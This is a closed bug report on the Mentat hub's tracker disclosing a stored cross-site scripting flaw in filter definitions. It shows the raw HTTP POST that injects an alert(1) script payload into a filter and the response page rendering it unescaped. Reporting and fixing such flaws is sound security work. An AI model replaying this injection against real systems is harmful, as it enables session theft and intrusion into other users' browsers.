Actions
Bug #7571
closedXSS at stored filters
Start date:
03/22/2022
Due date:
% Done:
100%
Estimated time:
To be discussed:
Description
POST /mentat/filters/60/update HTTP/1.1 Host: mentat-hub.cesnet.cz Cookie: session=.eJxxxbbd4e651a User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 525 Origin: https://mentat-hub.cesnet.cz Referer: https://mentat-hub.cesnet.cz/mentat/filters/60/update Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close name=egi+ftp+exclusion&description=exclude+detections+generated+by+elmo+towards+egi+ftp&type=advanced&filter=Category+IN+%5B%22Recon.Scanning%22%2C+%22a%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb%22%5D+AND+Target.IP4+IN+%5B%22193.62.192.0%2F21%22%2C+%22130.14.0.0%2F16%22%5D&categories=Recon.Scanning&ips=&enabled=True&valid_from=&valid_to=&next=https%3A%2F%2Fmentat-hub.cesnet.cz%2Fmentat%2Ffilters%2F60%2Fshow&csrf_token=IjJjNmZjZDZkY2ZhNzY0ZWQwM2MzNzQ2YzMyMTcxMzNiNWQxMjk3NTQi.Yh368w.aGotI4Oy-WR6Zwb49G_vXyY9IpQ&submit=Submit
HTTP/1.1 302 FOUND Date: Tue, 01 Mar 2022 10:52:44 GMT Server: Apache/2.4.38 (Debian)
GET /mentat/filters/60/show HTTP/1.1 Host: mentat-hub.cesnet.cz Cookie: session=.eJxNxxxxbd4e651a User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://mentat-hub.cesnet.cz/mentat/filters/60/update Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close HTTP/1.1 200 OK Date: Tue, 01 Mar 2022 10:52:44 GMT Server: Apache/2.4.38 (Debian) Strict-Transport-Security: max-age=31536000; includeSubDomains; preload <li class="pynspect-rule-list-item"><div class="pynspect-rule-constant pynspect-rule-constant-string">"a<script>alert(1)</script>b"
</div>
Related issues
Actions